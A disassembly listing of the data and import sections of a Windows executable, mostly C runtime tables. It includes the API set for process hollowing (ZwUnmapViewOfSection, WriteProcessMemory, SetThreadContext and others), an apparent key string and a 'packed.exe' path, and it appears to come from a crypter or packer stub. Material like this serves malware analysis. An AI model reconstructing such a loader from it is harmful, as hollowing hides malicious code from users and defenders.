dword_409048 dd 7C80180Eh ; DATA XREF: __read+84�r __read+14E�r ...
dword_40904C dd 7C81CDDAh ; DATA XREF: unknown_libname_1+29�r
; sub_405CBE-7�r ...
dword_409050 dd 7C80DDF5h ; DATA XREF: _doexit+13�r
; .text:0040816E�r
dword_409054 dd 7C80CC97h ; DATA XREF: __ioinit+19C�r
; .text:00408174�r
dword_409058 dd 7C812F39h ; DATA XREF: __ioinit+157�r
; __NMSG_WRITE+14E�r ...
dword_40905C dd 7C810E51h ; DATA XREF: __ioinit+FE�r
; __ioinit+165�r ...
dword_409060 dd 7C810B8Eh ; DATA XREF: __lseek+43�r
; __lseeki64+52�r ...
dword_409064 dd 7C91043Dh ; DATA XREF: _free+30�r .text:004042C8�r ...
dword_409068 dd 7C809B47h ; DATA XREF: __close+65�r __sopen+1E4�r ...
dword_40906C dd 7C810D87h ; DATA XREF: __NMSG_WRITE+155�r
; __write+F4�r ...
dword_409070 dd 7C862E2Ah ; DATA XREF: __XcptFilter+167�r
; .text:0040819E�r
dword_409074 dd 7C81DF77h ; DATA XREF: ___crtGetEnvironmentStringsA+113�r
; .text:004081A4�r
dword_409078 dd 7C81CF5Bh ; DATA XREF: ___crtGetEnvironmentStringsA:loc_404177�r
; .text:004081AA�r
dword_40907C dd 7C814AE7h ; DATA XREF: ___crtGetEnvironmentStringsA+C1�r
; .text:004081B0�r
dword_409080 dd 7C80A0D4h ; DATA XREF: ___crtGetEnvironmentStringsA:loc_40410F�r
; _wctomb+47�r ...
dword_409084 dd 7C812F08h ; DATA XREF: ___crtGetEnvironmentStringsA+B�r
; .text:004081BC�r
dword_409088 dd 7C810EF8h ; DATA XREF: __heap_init+44�r
; .text:0040432D�r ...
dword_40908C dd 7C812BB6h ; DATA XREF: __heap_init+11�r
; .text:004081C8�r
dword_409090 dd 7C809AE4h ; DATA XREF: .text:004042D8�r
; ___sbh_free_block+22F�r ...
dword_409094 dd 7C9179FDh ; DATA XREF: ___sbh_alloc_new_region+27�r
; _realloc+FD�r ...
dword_409098 dd 7C809E79h ; DATA XREF: ___sbh_heap_check+1B�r
; ___sbh_heap_check+55�r ...
dword_40909C dd 7C81DC03h ; DATA XREF: __set_osfhnd:loc_40568B�r
; __free_osfhnd:loc_405705�r ...
dword_4090A0 dd 7C812641h ; DATA XREF: unknown_libname_2+2C�r
; .text:004081E6�r
dword_4090A4 dd 7C801A24h ; DATA XREF: __sopen+1CC�r
; .text:004081EC�r
dword_4090A8 dd 7C801D77h ; DATA XREF: ___crtMessageBoxA+18�r
; .text:004081F2�r
dword_4090AC dd 7C809915h ; DATA XREF: .text:0040657F�r
; __setmbcp+42�r ...
dword_4090B0 dd 7C8127A7h ; DATA XREF: .text:0040656A�r
; __setmbcp+2B�r ...
dword_4090B4 dd 7C812E76h ; DATA XREF: _setSBUpLow+1C�r
; __setmbcp+93�r ...
dword_4090B8 dd 7C937A40h ; DATA XREF: sub_40820A�r
dword_4090BC dd 7C80978Eh ; DATA XREF: __ValidateEH3RN+131�r
; __ValidateEH3RN+196�r ...
dword_4090C0 dd 7C80B9D1h ; DATA XREF: __ValidateEH3RN+B3�r
; __resetstkoflw+1A�r ...
dword_4090C4 dd 7C9109EDh ; DATA XREF: __msize+30�r
; .text:0040821C�r
dword_4090C8 dd 7C80A427h ; DATA XREF: ___security_init_cookie+43�r
; .text:00408222�r
dword_4090CC dd 7C80929Ch ; DATA XREF: ___security_init_cookie+37�r
; .text:00408228�r
dword_4090D0 dd 7C809728h ; DATA XREF: ___security_init_cookie+2F�r
; .text:0040822E�r
dword_4090D4 dd 7C809920h ; DATA XREF: ___security_init_cookie+27�r
; .text:00408234�r
dword_4090D8 dd 7C8017E5h ; DATA XREF: ___security_init_cookie+1B�r
; .text:0040823A�r
dword_4090DC dd 7C832044h ; DATA XREF: __chsize+104�r
; .text:00408240�r
dword_4090E0 dd 7C838DE8h ; DATA XREF: ___crtLCMapStringA+2C3�r
; ___crtLCMapStringA+344�r ...
dword_4090E4 dd 7C809BF8h ; DATA XREF: ___crtLCMapStringA+C0�r
; ___crtLCMapStringA+141�r ...
dword_4090E8 dd 7C80CCA8h ; DATA XREF: ___crtLCMapStringA+27�r
; ___crtLCMapStringA+15B�r ...
dword_4090EC dd 7C838A0Ch ; DATA XREF: ___crtGetStringTypeA+19C�r
; .text:00408258�r
dword_4090F0 dd 7C80A490h ; DATA XREF: ___crtGetStringTypeA+24�r
; ___crtGetStringTypeA+128�r ...
dword_4090F4 dd 7C80D262h ; DATA XREF: ___ansicp+20�r
; .text:00408264�r
dword_4090F8 dd 7C801AD0h ; DATA XREF: __resetstkoflw+D5�r
; .text:0040826A�r
dword_4090FC dd 7C812D56h ; DATA XREF: __resetstkoflw+2B�r
; .text:00408270�r
dd 2 dup(0)
; char aYkjtrytryntnMr[]
aYkjtrytryntnMr db 'ykjtrytryntn,mrtme6bmn325byu435fcq3553323214325132215243132545613'
; DATA XREF: sub_4016B0�o
db '245441325v5354434 t4 tsre4 5g4sfd4g sfd4g sre4t4w4t432q4t441344t4'
db 'wtg 5sfd4h5 4sfd54 re5w4t 5ew4t4434t 54u4677uj8 d7yhg7sykjtrytryn'
db 'tn,mrtme6bmn325byu435fcq3553323214325132215243132545613245441325v'
db '5354434 t4 tsre4 5g4sfd4g sfd4g sre4t4w4t432q4t441344t4wtg 5sfd4h'
db '5 4sfd54 re5w4t 5ew4t4434t 54u4677uj8 d7yhg7s',0
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_4016D0+113�o
; WinMain(x,x,x,x)+185�o ...
align 4
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_4016D0+10E�o
; WinMain(x,x,x,x):loc_401A20�o
align 10h
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_4016D0+48�o
align 4
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_4016D0+43�o
align 4
; char aRb[]
aRb db 'rb',0 ; DATA XREF: WinMain(x,x,x,x)+36�o
align 4
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_408280�o
align 10h
stru_4092E0 _msEH <0FFFFFFFFh, offset loc_4020B2, offset loc_4020C6>
; DATA XREF: start+2�o __output+5E�r
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
byte_409308 db 6 ; DATA XREF: __output:loc_402E93�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
db 8,'`h````',0
dd 78707000h, 8787878h, 807h, 8080007h, 8000008h, 7000800h
dd 8
aNull_0: ; DATA XREF: .data:off_40B06C�o
unicode 0, <(null)>,0
align 4
aNull db '(null)',0 ; DATA XREF: .data:off_40B068�o
align 4
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 10h
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 10h
aSingError db 'SING error',0Dh,0Ah,0
align 10h
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_40B2F4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 4
; char asc_409748[]
asc_409748 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
byte_409783 db 0 ; DATA XREF: __wincmdln+1B�o
align 8
stru_409788 _msEH <0FFFFFFFFh, offset loc_4041EF, offset loc_4041F3>
; DATA XREF: sub_4041C2+2�o
align 8
stru_409798 _msEH <0FFFFFFFFh, offset loc_404233, offset loc_404237>
; DATA XREF: sub_404206+2�o
dd 41h dup(0)
asc_4098A8: ; DATA XREF: .data:off_40B598�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_409AAA dw 20h ; DATA XREF: .data:off_40B59C�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
stru_409CB0 _msEH <0FFFFFFFFh, offset sub_405CAA, offset sub_405CAE>
; DATA XREF: sub_405CBE-2F�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 10h
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 4
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 4
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_4072F2�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 10h
stru_409ED0 _msEH <0FFFFFFFFh, offset loc_4072CD, offset loc_4072D1>
; DATA XREF: ___security_error_handler+5�o
dword_409EDC dd 0 ; DATA XREF: ___crtLCMapStringA+1C�o
; ___crtGetStringTypeA+1E�o
stru_409EE0 _msEH <0FFFFFFFFh, offset loc_4078D1, offset loc_4078D5>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 4076CEh, 4076D2h, 0FFFFFFFFh, 40779Ch, 4077A0h
dd 0
stru_409F08 _msEH <0FFFFFFFFh, offset loc_407A6D, offset loc_407A71>
; DATA XREF: ___crtGetStringTypeA+2�o
align 8
stru_409F18 _msEH <0FFFFFFFFh, offset loc_407CE5, offset loc_407CE9>
; DATA XREF: ___convertcp+2�o
align 8
dd 48h, 0Eh dup(0)
dd offset dword_40B5A0
dd offset dword_409F70
dd 2
dword_409F70 dd 4390h, 69B4h, 0 ; DATA XREF: .rdata:00409F68�o
dword_409F7C dd 2 dup(0) ; DATA XREF: sub_4041C2+C�o
; sub_4041C2:loc_4041D5�o
dword_409F84 dd 0 ; DATA XREF: sub_404206+C�o
; sub_404206:loc_404219�o
dd 9FB0h, 2 dup(0)
dd 0A522h, 9000h, 5 dup(0)
dd 0A0B4h, 0A0C6h, 0A0DAh, 0A0EEh, 0A100h, 0A114h, 0A126h
dd 0A138h, 0A14Ch, 0A160h, 0A170h, 0A180h, 0A196h, 0A1ACh
dd 0A1BEh, 0A1D0h, 0A1E0h, 0A1ECh, 0A1FCh, 0A208h, 0A216h
dd 0A22Ah, 0A23Ch, 0A24Ch, 0A25Ah, 0A26Ch, 0A278h, 0A286h
dd 0A292h, 0A2AEh, 0A2C8h, 0A2E0h, 0A2FAh, 0A310h, 0A32Ah
dd 0A338h, 0A346h, 0A354h, 0A362h, 0A372h, 0A382h, 0A396h
dd 0A3A4h, 0A3B4h, 0A3BEh, 0A3CAh, 0A3D6h, 0A3E2h, 0A3F8h
dd 0A408h, 0A414h, 0A42Eh, 0A43Eh, 0A454h, 0A46Ah, 0A484h
dd 0A494h, 0A4A4h, 0A4BAh, 0A4CAh, 0A4DCh, 0A4EEh, 0A500h
dd 0A512h, 0
dd 6956037Ch, 61757472h, 6575516Ch, 78457972h, 2AC0000h
aReadprocessmem db 'ReadProcessMemory',0
dw 1CDh
aGetthreadconte db 'GetThreadContext',0
align 2
db '`',0
aCreateprocessa db 'CreateProcessA',0
align 10h
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 74h ; t
db 3, 56h, 69h
aRtualallocex db 'rtualAllocEx',0
align 2
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 7Ah ; z
db 3, 56h, 69h
aRtualprotectex db 'rtualProtectEx',0
align 10h
db 0C5h ; Å
db 2, 52h, 65h
aSumethread db 'sumeThread',0
align 10h
db 73h ; s
db 3, 56h, 69h
aRtualalloc db 'rtualAlloc',0
align 10h
db 0Ch
db 3, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 175h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
dd 654701AFh, 61745374h, 70757472h, 6F666E49h, 1080041h
dd 43746547h, 616D6D6Fh, 694C646Eh, 41656Eh, 654701DFh
dd 72655674h, 6E6F6973h, 417845h, 65480206h, 6C417061h
dd 636F6Ch, 65470169h, 73614C74h, 72724574h, 726Fh, 655202A9h
dd 69466461h, 656Ch, 784500AFh, 72507469h, 7365636Fh, 13A0073h
aGetcurrentproc db 'GetCurrentProcess',0
dw 317h
aSethandlecount db 'SetHandleCount',0
align 4
dd 654701B1h, 64745374h, 646E6148h, 656Ch, 6547015Eh, 6C694674h
dd 70795465h, 30E0065h, 46746553h, 50656C69h, 746E696Fh
dd 7265h, 6548020Ch, 72467061h, 6565h, 6C43002Eh, 4865736Fh
dd 6C646E61h, 3940065h, 74697257h, 6C694665h, 3600065h
aUnhandledexcep db 'UnhandledExceptionFilter',0
align 2
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
db 4Dh ; M
db 1, 47h, 65h
aTenvironmentst db 'tEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
dw 387h
aWidechartomult db 'WideCharToMultiByte',0
db 4Fh ; O
db 1, 47h, 65h
aTenvironment_0 db 'tEnvironmentStringsW',0
align 2
dw 20Ah
aHeapdestroy db 'HeapDestroy',0
dd 65480208h, 72437061h, 65746165h, 3760000h, 74726956h
dd 466C6175h, 656572h, 65480210h, 65527061h, 6F6C6C41h
dd 22C0063h, 61427349h, 69725764h, 74506574h, 32A0072h
dd 53746553h, 61486474h, 656C646Eh, 0E50000h, 73756C46h
dd 6C694668h, 66754265h, 73726566h, 4D0000h, 61657243h
dd 69466574h, 41656Ch, 6F4C0248h, 694C6461h, 72617262h
dd 4179h, 654700F5h, 50434174h, 18B0000h, 4F746547h, 50434D45h
dd 0FC0000h, 43746547h, 666E4950h, 2CA006Fh, 556C7452h
dd 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
db 7Bh ; {
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 97h ; —
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 3
db 3, 53h, 65h
aTendoffile db 'tEndOfFile',0
align 4
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh, 454B006Fh, 4C454E52h, 642E3233h, 6C6Ch
_rdata ends
; Section 3. (virtual address 0000B000)
; Virtual size : 00001CD8 ( 7384.)
; Section size in file : 00001CD8 ( 7384.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 40B000h
dword_40B000 dd 0 ; DATA XREF: __cinit+45�o
dd offset ___security_init_cookie
dd offset sub_408280
dword_40B00C dd 0 ; DATA XREF: __cinit+4C�o
dword_40B010 dd 0 ; DATA XREF: __cinit+12�o
dd offset ___initstdio
dd offset ___onexitinit
dd offset ___initmbctable
dword_40B020 dd 0 ; DATA XREF: __cinit+17�o
dword_40B024 dd 0 ; DATA XREF: _doexit:loc_4028B4�o
dd offset ___endstdio
dword_40B02C dd 0 ; DATA XREF: _doexit+6C�o
dword_40B030 dd 0 ; DATA XREF: _doexit:loc_4028D3�o
dword_40B034 dd 3 dup(0) ; DATA XREF: _doexit+8B�o
; __int32 Offset
Offset dd 9A00h ; DATA XREF: sub_401000+25�r
; sub_401000:loc_401048�r ...
byte_40B044 db 0EDh ; DATA XREF: sub_401000+68�r
; sub_401000+E9�r ...
byte_40B045 db 0EBh ; DATA XREF: sub_401000+6E�r
; sub_401000+EF�r ...
align 10h
off_40B050 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_40B054 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r ...
align 10h
dword_40B060 dd 0FFFFFFFFh, 0A80h ; DATA XREF: __filbuf:loc_4021F3�o
; __flsbuf:loc_405B30�o
off_40B068 dd offset aNull ; DATA XREF: __output:loc_40321F�r
; __output+51C�r
; "(null)"
off_40B06C dd offset aNull_0 ; DATA XREF: __output+2D8�r
; "(null)"
off_40B070 dd offset dword_40BBA0 ; DATA XREF: .text:00403621�o
; ___initstdio+52�o
align 8
dd offset dword_40BBA0
dd 101h
dword_40B080 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+71�o
dd 1000h, 0
; FILE stru_40B090
stru_40B090 FILE <0, 0, 0, 2, 0FFFFFFFFh, 0, 0, 0> ; DATA XREF: _printf+3�o
; __stbuf+12�o ...
dword_40B0B0 dd 3 dup(0) ; DATA XREF: __stbuf:loc_402CD4�o
; __flsbuf+5B�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_40B0E0 dd 3, 0 ; DATA XREF: ___initstdio+9A�o
dd 200h, 81h dup(0)
dword_40B2F0 dd 2 ; DATA XREF: ___initstdio+67�o
; __NMSG_WRITE:loc_4039F7�r ...
off_40B2F4 dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+D5�r
; __NMSG_WRITE+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4096CCh, 9, 4096A0h, 0Ah, 409608h, 10h, 4095DCh
dd 11h, 4095ACh, 12h, 409588h, 13h, 40955Ch, 18h, 409524h
dd 19h, 4094FCh, 1Ah, 4094C4h, 1Bh, 40948Ch, 1Ch, 409464h
dd 1Dh, 4093C0h, 78h, 4093B0h, 79h, 4093A0h, 7Ah, 409390h
dd 0FCh, 40938Ch, 0FFh, 40937Ch
dword_40B388 dd 0C0000005h, 0Bh, 0 ; DATA XREF: .text:00403BB1�o
; __XcptFilter+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_40B400 dd 3 ; DATA XREF: __XcptFilter+84�r
dword_40B404 dd 7 ; DATA XREF: __XcptFilter+89�r
dword_40B408 dd 0Ah ; DATA XREF: .text:_xcptlookup�r
; __XcptFilter+6�r
dword_40B40C dd 8Ch ; DATA XREF: __XcptFilter+B2�r
; __XcptFilter+BA�w ...
dd 10h, 0
dword_40B418 dd 1 ; DATA XREF: __dosmaperr:loc_40548E�r
dword_40B41C dd 16h ; DATA XREF: __dosmaperr:loc_4054B2�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_40B580 dd offset __fptrap ; DATA XREF: __output+476�r
off_40B584 dd offset __fptrap ; DATA XREF: __output+4A2�r
dd offset __fptrap
off_40B58C dd offset __fptrap ; DATA XREF: __output+491�r
dd offset __fptrap
dd offset __fptrap
off_40B598 dd offset asc_4098A8 ; DATA XREF: __output:loc_403043�r
; .text:00405C87�r ...
; " ((((( H"
off_40B59C dd offset word_409AAA ; DATA XREF: .text:00405C81�r
dword_40B5A0 dd 243A3347h ; DATA XREF: __output+E�r
; __NMSG_WRITE+E�r ...
align 10h
byte_40B5B0 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 8
dword_40B5B8 dd 3A4h ; DATA XREF: __setmbcp:loc_4067F9�r
dword_40B5BC dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_40B5C8 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_40B6A8 dd 19930520h, 5 dup(0) ; DATA XREF: .text:00406A63�o
; __NLG_Notify+2�o
dd 1
dword_40B6C4 dd 1 ; DATA XREF: _wctomb+30�r
; __ismbcspace:loc_408002�r
dd 2Eh, 1, 4 dup(0)
dword_40B6E0 dd 34h ; DATA XREF: sub_4016D0+185�w
; .text:00401880�r ...
dword_40B6E4 dd 2Ch ; DATA XREF: sub_4016D0+4D�w
; sub_4016D0+6C�r
dword_40B6E8 dd 400000h ; DATA XREF: sub_4016D0+53�w
; sub_4016D0+66�r
dword_40B6EC dd 2Ch ; DATA XREF: sub_4016D0+17F�w
; WinMain(x,x,x,x)+172�r ...
byte_40B6F0 db 1 ; DATA XREF: .text:00401886�w
; WinMain(x,x,x,x)+1B1�w ...
align 4
dword_40B6F4 dd 400000h ; DATA XREF: sub_4016D0+31�w
; sub_4016D0+94�w ...
dword_40B6F8 dd 7C862A69h ; DATA XREF: sub_4016D0+18A�r
; sub_408280+17�w
; void *Memory
Memory dd 0 ; DATA XREF: start+11C�w
; __setenvp:loc_403DDD�r ...
dd 0
dword_40B704 dd 0 ; DATA XREF: __amsg_exit�r
; .text:_fast_error_exit�r ...
dword_40B708 dd 0 ; DATA XREF: _ftell+8F�w
; _fseek:loc_401D53�w ...
dword_40B70C dd 0 ; DATA XREF: __read+9B�w
; __read:loc_402423�w ...
dword_40B710 dd 0 ; DATA XREF: __sopen+149�r
dword_40B714 dd 2 ; DATA XREF: start+29�w ___heap_select�r ...
dword_40B718 dd 0A28h ; DATA XREF: start+49�w start+5A�w
dword_40B71C dd 501h ; DATA XREF: start+65�w
dword_40B720 dd 5 ; DATA XREF: start+32�w
; ___heap_select+9�r ...
dword_40B724 dd 1 ; DATA XREF: start+3A�w
dword_40B728 dd 1 ; DATA XREF: __setargv+8F�w
dword_40B72C dd 3213F8h ; DATA XREF: __setargv+95�w
dd 0
; void *dword_40B734
dword_40B734 dd 321418h ; DATA XREF: __setenvp+48�w
; __setenvp:loc_403E7C�r ...
dd 3 dup(0)
off_40B744 dd offset aCM_unpackerPac ; DATA XREF: __setargv+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_40B74C db 0 ; DATA XREF: _doexit+2D�w
; ___endstdio+5�r
align 10h
dword_40B750 dd 1 ; DATA XREF: _doexit+27�w
dword_40B754 dd 1 ; DATA XREF: _doexit+7�r _doexit+B0�w
align 10h
dword_40B760 dd 2 ; DATA XREF: __stbuf:loc_402CDF�w
; __openfile+14C�w ...
dword_40B764 dd 0 ; DATA XREF: __FF_MSGBANNER+21�r
dword_40B768 dd 0 ; DATA XREF: __XcptFilter+68�r
; __XcptFilter+73�w ...
align 10h
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: __setargv+1C�o
; .data:off_40B744�o
align 4
dd 3Ah dup(0)
byte_40B874 db 0 ; DATA XREF: __setargv+23�w
align 4
dword_40B878 dd 1 ; DATA XREF: ___crtGetEnvironmentStringsA+2�r
; ___crtGetEnvironmentStringsA+24�w ...
dword_40B87C dd 0 ; DATA XREF: .text:00405412�r
; .text:00405417�w ...
dword_40B880 dd 0 ; DATA XREF: _malloc�r
; _calloc:loc_405DB8�r ...
dword_40B884 dd 0 ; DATA XREF: __openfile+7�r
dword_40B888 dd 0 ; DATA XREF: ___crtMessageBoxA+9�r
; ___crtMessageBoxA+38�w ...
dword_40B88C dd 0 ; DATA XREF: ___crtMessageBoxA+4D�w
; ___crtMessageBoxA:loc_4061E4�r
dword_40B890 dd 0 ; DATA XREF: ___crtMessageBoxA+5B�w
; ___crtMessageBoxA+D6�r
dword_40B894 dd 0 ; DATA XREF: ___crtMessageBoxA+7B�w
; ___crtMessageBoxA:loc_40619F�r
dword_40B898 dd 0 ; DATA XREF: ___crtMessageBoxA+6C�w
; ___crtMessageBoxA+9C�r
dword_40B89C dd 1 ; DATA XREF: .text:_getSystemCP�w
; .text:00406560�w ...
dword_40B8A0 dd 0 ; DATA XREF: __ValidateEH3RN:loc_406B09�r
; __ValidateEH3RN+13F�r ...
align 8
dword_40B8A8 dd 0 ; DATA XREF: __ValidateEH3RN:loc_406B1C�r
; __ValidateEH3RN+1C4�r ...
dd 0Fh dup(0)
dword_40B8E8 dd 3 dup(0) ; DATA XREF: __ValidateEH3RN+12C�o
